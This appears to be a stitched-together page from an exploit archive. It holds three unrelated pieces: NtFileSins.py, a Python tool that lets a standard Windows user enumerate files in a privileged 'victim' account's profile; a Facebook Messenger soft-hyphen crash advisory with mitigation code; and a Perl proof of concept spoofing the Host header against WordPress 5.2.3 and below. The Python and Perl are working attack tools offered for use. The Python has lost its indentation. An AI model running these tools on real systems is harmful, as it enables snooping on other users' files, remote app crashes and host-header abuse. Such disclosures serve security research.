import sys,argparse,re

# Windows File Enumeration Intel Gathering.
# Standard users can prove existence of privileged user artifacts.
#
# Typically, the Windows commands DIR or TYPE hand out a default "Access Denied" error message,
# when a file exists or doesn't exist, when restricted access is attempted by another user.
#
# However, accessing files directly by attempting to "open" them from cmd.exe shell,
# we can determine existence by compare inconsistent Windows error messages.
#
# Requirements: 1) target users with >= privileges.
# 2) artifacts must contain a dot "." or returns false positives.
#
# Windows message "Access Denied" = Exists
# Windows message "The system cannot find the file" = Not exists
# Windows returns "no message" OR "c:\victim\artifact is not recognized as an internal or external command,
# operable program or batch file" = Admin to Admin so this script is not required.
#
# Profile other users by compare ntfs error messages to potentially learn their activities or machines purpose.
# For evil or maybe check for basic malware IOC existence on disk with user-only rights.
#
#=====================================================================#
# NtFileSins.py - Windows File Enumeration Intel Gathering Tool. #
# By John Page (aka hyp3rlinx) #
# Apparition Security #
#=====================================================================#

BANNER='''
_ _______________ __ _____ _
/ | / /_ __/ ____(_) /__ / ___/(_)___ _____
/ |/ / / / / /_ / / / _ \\__ \ / / __ \/ ___/
/ /| / / / / __/ / / / __/__/ / / / / (__ )
/_/ |_/ /_/ /_/ /_/_/\___/____/_/_/ /_/____/
By hyp3rlinx
ApparitionSec
'''

sin_cnt=0
found_set=set()
ARTIFACTS_SET=set()
ROOTDIR = "c:/Users/"

USER_DIRS=["Contacts","Desktop","Downloads","Favorites","My Documents","Searches","Videos/Captures",
"Pictures","Music","OneDrive","OneDrive/Attachments","OneDrive/Documents"]

APPDATA_DIR=["AppData/Local/Temp"]

EXTS = set([".contact",".url",".lnk",".search-ms",".exe",".csv",".txt",".ini",".conf",".config",".log",".pcap",".zip",".mp4",".mp3", ".bat",
".wav",".docx",".pptx",".reg",".vcf",".avi",".mpg",".jpg",".jpeg",".png",".rtf",".pdf",".dll",".xml",".doc",".gif",".xls",".wmv"])

REPORT="NtFileSins_Log.txt"

def usage():
print "NtFileSins is a privileged file access enumeration tool to search multi-account artifacts without admin rights.\n"
print '-u victim -d Searches -a "MS17-020 - Google Search.url"'
print '-u victim -a "<name.ext>"'
print "-u victim -d Downloads -a <name.ext> -s"
print '-u victim -d Contacts -a "Mike N.contact"'
print "-u victim -a APT.txt -b -n"
print "-u victim -d Desktop/MyFiles -a <.name>"
print "-u victim -d Searches -a <name>.search-ms"
print "-u victim -d . -a <name.ext>"
print "-u victim -d desktop -a inverted-crosses.mp3 -b"
print "-u victim -d Downloads -a APT.exe -b"
print "-u victim -f list_of_files.txt"
print "-u victim -f list_of_files.txt -b -s"
print "-u victim -f list_of_files.txt -x .txt"
print "-u victim -d desktop -f list_of_files.txt -b"
print "-u victim -d desktop -f list_of_files.txt -x .rar"

def parse_args():
parser.add_argument("-u", "--user", help="Privileged user target")
parser.add_argument("-d", "--directory", nargs="?", help="Specific directory to search <e.g. Downloads>.")
parser.add_argument("-a", "--artifact", help="Single artifact we want to verify exists.")
parser.add_argument("-t", "--appdata", nargs="?", const="1", help="Searches the AppData/Local/Temp directory.")
parser.add_argument("-f", "--artifacts_from_file", nargs="?", help="Enumerate a list of supplied artifacts from a file.")
parser.add_argument("-n", "--notfound", nargs="?", const="1", help="Display unfound artifacts.")
parser.add_argument("-b", "--built_in_ext", nargs="?", const="1", help="Enumerate files using NtFileSin built-in ext types, if no extension is found NtFileSins will switch to this feature by default.")
parser.add_argument("-x", "--specific_ext", nargs="?", help="Enumerate using specific ext, e.g. <.exe> using a supplied list of artifacts, a supplied ext will override any in the supplied artifact list.")
parser.add_argument("-s", "--save", nargs="?", const="1", help="Saves successfully enumerated artifacts, will log to "+REPORT)
parser.add_argument("-v", "--verbose", nargs="?", const="1", help="Displays the file access error messages.")
parser.add_argument("-e", "--examples", nargs="?", const="1", help="Show example usage.")
return parser.parse_args()


def access(j):
result=""
try:
p = Popen([j], stdout=PIPE, stderr=PIPE, shell=True)
stderr,stdout = p.communicate()
result = stdout.strip()
except Exception as e:
#print str(e)
pass
return result


def artifacts_from_file(artifacts_file, bflag, specific_ext):
try:
f=open(artifacts_file, "r")
for a in f:
idx = a.rfind(".")
a = a.strip()
if a != "":
if specific_ext:
if idx==-1:
a = a + specific_ext
else:
#replace existing ext
a = a[:idx] + specific_ext
if bflag:
ARTIFACTS_SET.add(a)
else:
ARTIFACTS_SET.add(a)
f.close()
except Exception as e:
print str(e)
exit()


def save():
try:
f=open(REPORT, "w")
for j in found_set:
f.write(j+"\n")
f.close()
except Exception as e:
print str(e)


def recon_msg(s):
if s == 0:
return "Access is denied."
else:
return "\t[*] Artifact exists ==>"


def echo_results(args, res, x, i):
global sin_cnt
if res=="":
print "\t[!] No NTFS message, you must already be admin, then this script is not required."
exit()
if "not recognized as an internal or external command" in res:
print "\t[!] You must target users with higher privileges than yours."
exit()
if res != recon_msg(0):
if args.verbose:
print "\t"+res
else:
if args.notfound:
print "\t[-] not found: " + x +"/"+ i
else:
sin_cnt += 1
if args.save:
found_set.add(x+"/"+i)
if args.verbose:
print recon_msg(1)+ x+"/"+i
print "\t"+res
else:
print recon_msg(1)+ x+"/"+i


def valid_artifact_name(sin,args):
idx = "." in sin
if re.findall(r"[/\\*?:<>|]", sin):
print "\t[!] Skipping: disallowed file name character."
return False
if not idx and not args.built_in_ext and not args.specific_ext:
print "\t[!] Warning: '"+ sin +"' has no '.' in the artifact name, this can result in false positives."
print "\t[+] Searching for '"+ sin +"' using built-in ext list to prevent false positives."
if not args.built_in_ext:
if sin[-1] == ".":
print "\t[!] Skipping: "+sin+" non valid file name."
return False
return True


def search_missing_ext(path,args,i):
for x in path:
for e in EXTS:
res = access(ROOTDIR+args.user+"/"+x+"/"+i+e)
echo_results(args, res, x, i+e)



def ntsins(path,args,i):
if i.rfind(".")==-1:
search_missing_ext(path,args,i)
i=""
for x in path:
if i != "":
if args.built_in_ext:
for e in EXTS:
res = access(ROOTDIR+args.user+"/"+x+"/"+i+e)
echo_results(args, res, x, i+e)
elif args.specific_ext:
idx = i.rfind(".")
if idx == -1:
i = i + "."
else:
i = i[:idx] + args.specific_ext
res = access(ROOTDIR+args.user+"/"+x+"/"+i)
echo_results(args, res, x, i)


def search(args):
print "\tSearching...\n"
global ROOTDIR, USER_DIRS, ARTIFACTS_SET

if args.artifact:
ARTIFACTS_SET = set([args.artifact])

for i in ARTIFACTS_SET:
idx = i.rfind(".") + 1
if idx and args.built_in_ext:
i = i[:idx -1:None]
if len(i) > 0 and i != None:
if valid_artifact_name(i,args):
#specific user dir search
if args.directory:
single_dir=[args.directory]
ntsins(single_dir,args,i)
#search appdata dirs
elif args.appdata:
ntsins(APPDATA_DIR,args,i)
#all default user dirs
else:
ntsins(USER_DIRS,args,i)

if args.save and len(found_set) != 0:
save()


def check_dir_input(_dir):
if len(re.findall(r":", _dir)) != 0:
print "[!] Check the directory arg, NtFileSins searches under c:/Users/target by default see Help -h."
return False
return True


def main(args):

if len(sys.argv)==1:
parser.print_help(sys.stderr)
sys.exit(1)

if args.examples:
usage()
exit()

if not args.user:
print "[!] No target user specified see Help -h"
exit()

if args.appdata and args.directory:
print "[!] Multiple search directories supplied see Help -h"
exit()

if args.specific_ext:
if "." not in args.specific_ext:
print "[!] Must use full extension e.g. -x ."+args.specific_ext+", dot in filenames mandatory to prevent false positives."
exit()

if args.artifact and args.artifacts_from_file:
print "[!] Multiple artifacts specified, use just -f or -a see Help -h"
exit()

if args.built_in_ext and args.specific_ext:
print "\t[!] Both specific and built-in extensions supplied, use only one."
exit()

if args.specific_ext and not args.artifacts_from_file:
print "\t[!] -x to be used with -f flag only see Help -h."
exit()

if args.artifact:
if args.artifact.rfind(".")==-1:
print "\t[!] Artifacts must contain a .ext or will result in false positives."
exit()

if args.directory:
if not check_dir_input(args.directory):
exit()

if args.artifacts_from_file:
artifacts_from_file(args.artifacts_from_file, args.built_in_ext, args.specific_ext)

if not args.artifact and not args.artifacts_from_file:
print "[!] Exiting, no artifacts supplied see Help -h"
exit()
else:
search(args)

print "\n\tNtFileSins Detected "+str(sin_cnt)+ " out of %s" % str(len(ARTIFACTS_SET)) + " Sins.\n"

if not args.notfound:
print "\tuse -n to display unfound enumerated files."
if not args.built_in_ext:
print "\tfor extra search coverage try -b flag or targeted artifact search -a."

if __name__ == "__main__":
print BANNER
parser = argparse.ArgumentParser()
main(parse_args())




[POC Video URL]
https://www.youtube.com/watch?v=rm8kEbewqpI



[Network Access]
Remote/Local



[Severity]
Low


[Disclosure Timeline]
Vendor Notification: July 29, 2019
MSRC "does not meet the bar for security servicing" : July 29, 2019
September 5, 2019 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

Facebook Messenger Denial Of Service


Facebook Messenger suffered from an application crash denial of service vulnerability when sent a single hyphen.


MD5 | f9c39e248cc5f36277b1a247ed2200ab

Facebook Messenger Remote Denial of Service Vulnerability Report by Social Engineering Neo.


Affected Platforms: -
Android ≤9
IOS ≤11
Messenger
Messenger Lite


Tested On: -
Android 6 & 7
IOS 11
Messenger (build 228.1.0.10.116)
Messenger Lite (build 65.0.1.18.236)


Class: -
Denial of Service.


Summary: -
All versions of Messenger Lite and multiple versions of Messenger are susceptible to a remote denial of service vulnerability.


Short Description: -
A user can remotely crash a user’s Messenger application by sending a message containing a single character.


Long Description: -
'ATTACKER' sends a single soft hyphen (U+00AD) to 'VICTIM'.
Upon opening the message, the Messenger application on the 'VICTIM' device crashes while rendering that single character.


Proof of Concept: -
####
Tested on Latest Version of Messenger Lite on Android 6

'ATTACKER' sends a single soft hyphen to 'VICTIM'
'VICTIM' opens the message sent by 'ATTACKER'
####

VIDEO: - https://youtu.be/En1npDpgv_o


Expected Result: -
It shouldn't be possible to remotely crash the application on a remote user’s device.


Observed Result: -
Application remotely crashes upon loading message.


Our Recommendation:
Handle the soft hyphen (U+00AD) safely in the message rendering path, so that a message consisting only of that character is displayed (or dropped) without crashing the application.
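As an added example (not code from the advisory or from Facebook), the following Python shows the kind of server-side or client-side screening step the recommendation above implies. It goes beyond the single soft hyphen: every character in Unicode general category Cf (format characters such as U+200B ZERO WIDTH SPACE) is equally invisible, so a message made of nothing but such characters is rejected, and a short list of meaningless ones is stripped before rendering. The policy, the strip list and the sample inputs are assumptions for illustration; U+200C/U+200D are kept on purpose because emoji ZWJ sequences and Indic scripts depend on them.

```python
import unicodedata

# Assumed policy (not from the advisory): a message that is nothing but invisible
# format characters is rejected outright, and a short list of format characters
# that carry no meaning for the reader is stripped before the text reaches the
# renderer. U+200C/U+200D are deliberately kept: they are Cf too, but emoji and
# Indic scripts depend on them, so stripping them would corrupt real messages.
SOFT_HYPHEN = "\u00ad"
STRIP_BEFORE_RENDER = {
    SOFT_HYPHEN,   # U+00AD SOFT HYPHEN, the character in the crash report
    "\u200b",      # ZERO WIDTH SPACE
    "\u2060",      # WORD JOINER
    "\ufeff",      # ZERO WIDTH NO-BREAK SPACE (BOM)
}


def format_chars(text):
    """Offsets and code points of every Unicode format (Cf) character in text."""
    return [(i, f"U+{ord(ch):04X}") for i, ch in enumerate(text)
            if unicodedata.category(ch) == "Cf"]


def is_format_only(text):
    """True when the message is non-empty and every character is a Cf character."""
    return bool(text) and all(unicodedata.category(ch) == "Cf" for ch in text)


def sanitize_for_render(text):
    """Remove the listed invisible characters; leave everything else untouched."""
    return "".join(ch for ch in text if ch not in STRIP_BEFORE_RENDER)


def screen_message(text):
    """Apply the policy. Returns (accepted, text_to_render, reason)."""
    if is_format_only(text):
        found = ", ".join(cp for _, cp in format_chars(text))
        return False, "", f"message consists only of invisible format characters ({found})"
    return True, sanitize_for_render(text), ""


if __name__ == "__main__":
    # Constructed sample inputs: the one-character payload from the report,
    # a word with an embedded soft hyphen, an emoji ZWJ sequence, plain text.
    for sample in (SOFT_HYPHEN, "co\u00adoperate", "\U0001F468\u200d\U0001F469", "hello"):
        print(repr(sample), "->", screen_message(sample))
```

Screening like this is a mitigation at the message boundary, not a fix for the renderer: the actual defect is that the display code cannot cope with a soft hyphen standing alone, and that path still needs to be made robust regardless of what the transport filters.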


CVSS v3 Vector: -
AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H/E:F/RL:O/RC:R/CR:X/IR:X/AR:X/MAV:N/MAC:L/MPR:N/MUI:N/MS:U/MC:N/MI:L/MA:H

CVSS Base Score: - 8.2
Impact Subscore: - 4.2
Exploitability Subscore: - 3.9
CVSS Temporal Score: - 7.3
CVSS Environmental Score: - 7.3
Modified Impact Subscore: - 4.2
Overall CVSS Score: - 7.3


CVSS v2 Vector: -
AV:N/AC:L/Au:N/C:N/I:P/A:C/E:F/RL:OF/RC:UR/CDP:LM/TD:M/CR:ND/IR:ND/AR:ND

CVSS Base Score: - 8.5
Impact Subscore: - 7.8
Exploitability Subscore: - 10.0
CVSS Temporal Score: - 6.7
CVSS Environmental Score: - 5.7
Modified Impact Subscore: - 7.8
Overall CVSS Score: - 5.7


TIMELINE: - Discovery 2017
: - Initial Report 23rd August 2019
: - Case Opened 23rd August 2019
: - Added Detail 24th August 2019 *Public Disclosure Date: - Sep 18th 2019 UTC -08:00 (25 days from initial report)*
: - Added Detail 27th August 2019
: - Response 27th August 2019
: - Added Detail 27th August 2019
: - Response 29th August 2019
: - Added Detail 29th August 2019
: - Response 1st September 2019
: - Added Detail 1st September 2019
: - Case Closed 5th September 2019 *PATCH RELEASED PUBLICLY*
: - Added Detail 5th September 2019 *Public Disclosure Date: - Sep 6th 2019 UTC -08:00 (24 hours from patch)*

: - We thank the Facebook Security team for their quick patch.

WordPress 5.2.3 Remote Cross Site Host Modification


WordPress versions 5.2.3 and below remote cross site host modification proof of concept demo exploit.


MD5 | a24e8725d0673921cf2836f076c013d4

#!/usr/bin/perl -w
#
# Wordpress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit
#
# Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
# Type: Remote
# Risk: High
#
# Solution:
# Make the web server's default (catch-all) vhost refuse requests whose Host header is not one
# of the site's configured names, pin the site URL in WordPress (WP_HOME/WP_SITEURL), and send
# Cache-Control: no-cache so a response generated for a spoofed Host cannot be stored by a cache.
#
# Simple Attack Scenarios:
#
# o This attack can bypass Simple WAF to access restricted content on the web server,
# something like phpMyAdmin;
#
# o This attack can deface the vulnerable Wordpress website with content from the default vhost;
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# # Wordpress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit
# # ====================================================================================
# # Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
# # > Host => default-vhost.com
# # > User-Agent => Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko)
# # > Content-Type => application/x-www-form-urlencoded
# # < Connection => close
# # < Date => Fri, 06 Sep 2019 11:39:43 GMT
# # < Location => https://default-vhost.com/
# # < Server => nginx
# # < Content-Type => text/html; charset=UTF-8
# # < Client-Date => Fri, 06 Sep 2019 11:39:43 GMT
# # < Client-Peer => 13.37.13.37:443
# # < Client-Response-Num => 1
# # < Client-SSL-Cert-Issuer => /C=US/O=Let's Encrypt/CN=Let's Encrypt Authority X3
# # < Client-SSL-Cert-Subject => /CN=default-vhost.com
# # < Client-SSL-Cipher => ECDHE-RSA-AES256-GCM-SHA384
# # < Client-SSL-Socket-Class => IO::Socket::SSL
# # < Client-SSL-Warning => Peer certificate not verified
# # < Client-Transfer-Encoding => chunked
# # < Strict-Transport-Security => max-age=31536000;
# # < X-Powered-By => PHP/7.3.9
# # < X-Redirect-By => WordPress
# # ====================================================================================
#
#
#
use strict;
use v5.10;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;


my $host = shift || '';
my $attacker = shift || 'default-vhost.com';


say "# Wordpress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit
# ====================================================================================
# Author: Todor Donev 2019 (c) <todor.donev at gmail.com>";
if ($host !~ m/^http/){
say "# e.g. perl $0 https://target:port/ default-vhost.com";
exit;
}

my $user_agent = rand_ua("browsers");
my $browser = LWP::UserAgent->new(
    protocols_allowed => ['http', 'https'],
    ssl_opts => { verify_hostname => 0 }   # the target's certificate will not match the spoofed Host
);
$browser->timeout(10);
$browser->agent($user_agent);

# Connect to the real target, but present the attacker-chosen name in the Host header.
# A server that routes on Host, or an application that builds URLs from it, answers
# for $attacker instead of $host (see the sample run above).
my $request = HTTP::Request->new (POST => $host,[Content_Type => "application/x-www-form-urlencoded"], "");
$request->header("Host" => $attacker);
my $response = $browser->request($request);
say "# 401 Unauthorized!\n" and exit if ($response->code eq '401');
say "# > $_ => ", $request->header($_) for $request->header_field_names;
say "# < $_ => ", $response->header($_) for $response->header_field_names;
say "# ====================================================================================";
